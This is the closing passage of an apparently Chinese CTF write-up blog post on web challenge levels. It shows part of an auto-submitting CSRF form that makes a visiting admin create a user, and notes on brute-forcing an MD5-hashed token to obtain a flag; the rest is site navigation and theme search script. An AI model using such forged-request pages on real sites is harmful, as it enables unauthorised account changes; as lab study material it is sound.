class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"username"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"password"</span>&gt;</span></span><br><span class="line">        </span><br><span class="line">    <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="javascript">    <span class="keyword">var</span> f=<span class="built_in">document</span>.getElementById(<span class="string">"test"</span>);</span></span><br><span class="line"><span class="javascript">    f.getElementsByTagName(<span class="string">"input"</span>)[<span class="number">0</span>].value=<span class="string">"test"</span>;</span></span><br><span class="line"><span class="javascript">    f.getElementsByTagName(<span class="string">"input"</span>)[<span class="number">1</span>].value=<span class="string">"pass"</span>;</span></span><br><span class="line"><span class="undefined">    f.submit();</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后管理员访问就能插入用户了，登陆拿到flag</p>
<h4 id="第三关：-1"><a href="#第三关：-1" class="headerlink" title="第三关："></a>第三关：</h4><p>进去是特斯拉的商城界面，点击购买，会有弹窗提示无法购买</p>
<p>查看源码能得到信息：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--关键参数可猜解--&gt;</span><br><span class="line">&lt;!--ip.txt--&gt;</span><br></pre></td></tr></table></figure>
<p>访问ip.txt发现是一系列的ip，猜测需要爆破</p>
<p>这里有一个坑，肯定很多人会去爆破x-forward-for参数，但其实是爆破token参数，并且爆破的时候要用md5加密</p>
<p>爆破成功后访问就能拿到flag</p>

      
    </div>
    
    
    

    

    
      <div>
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">----------------------这是我的底线-----------------------</div>
    
</div>

      </div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Write-Up/" rel="tag"><i class="fa fa-tag"></i> Write Up</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/07/Google-hacking&Shodan/" rel="next" title="Google hacking&Shodan">
                <i class="fa fa-chevron-left"></i> Google hacking&Shodan
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/11/16/BAT脚本入门/" rel="prev" title="BAT脚本入门">
                BAT脚本入门 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">spira1</p>
              <p class="site-description motion-element" itemprop="description">路还很长，我的目标是星辰大海</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">76</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="mailto:eagerseven@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#本地文件包含："><span class="nav-number">1.</span> <span class="nav-text">本地文件包含：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#第一关："><span class="nav-number">1.0.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第二关："><span class="nav-number">1.0.2.</span> <span class="nav-text">第二关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第三关："><span class="nav-number">1.0.3.</span> <span class="nav-text">第三关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#总结："><span class="nav-number">1.0.4.</span> <span class="nav-text">总结：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#远程文件包含："><span class="nav-number">2.</span> <span class="nav-text">远程文件包含：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#第一关：-1"><span class="nav-number">2.0.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第二关：-1"><span class="nav-number">2.0.2.</span> <span class="nav-text">第二关：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL字符型注入："><span class="nav-number">3.</span> <span class="nav-text">SQL字符型注入：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#第一关：-2"><span class="nav-number">3.0.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第二关：-2"><span class="nav-number">3.0.2.</span> <span class="nav-text">第二关：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#第三关"><span class="nav-number">3.0.3.</span> <span class="nav-text">第三关:</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#总结：-1"><span class="nav-number">3.1.</span> <span class="nav-text">总结：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#报错注入"><span class="nav-number">4.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一关：-3"><span class="nav-number">4.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二关：-3"><span class="nav-number">4.2.</span> <span class="nav-text">第二关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#总结：-2"><span class="nav-number">4.3.</span> <span class="nav-text">总结：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于时间的盲注："><span class="nav-number">5.</span> <span class="nav-text">基于时间的盲注：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一关：-4"><span class="nav-number">5.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二关：-4"><span class="nav-number">5.2.</span> <span class="nav-text">第二关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#彩蛋题："><span class="nav-number">5.3.</span> <span class="nav-text">彩蛋题：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件上传："><span class="nav-number">6.</span> <span class="nav-text">文件上传：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一关：-5"><span class="nav-number">6.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二关：-5"><span class="nav-number">6.2.</span> <span class="nav-text">第二关：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS："><span class="nav-number">7.</span> <span class="nav-text">XSS：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一关：-6"><span class="nav-number">7.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二关：-6"><span class="nav-number">7.2.</span> <span class="nav-text">第二关：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CSRF："><span class="nav-number">8.</span> <span class="nav-text">CSRF：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一关：-7"><span class="nav-number">8.1.</span> <span class="nav-text">第一关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二关：-7"><span class="nav-number">8.2.</span> <span class="nav-text">第二关：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第三关：-1"><span class="nav-number">8.3.</span> <span class="nav-text">第三关：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>



        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">spira1</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>

-->


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
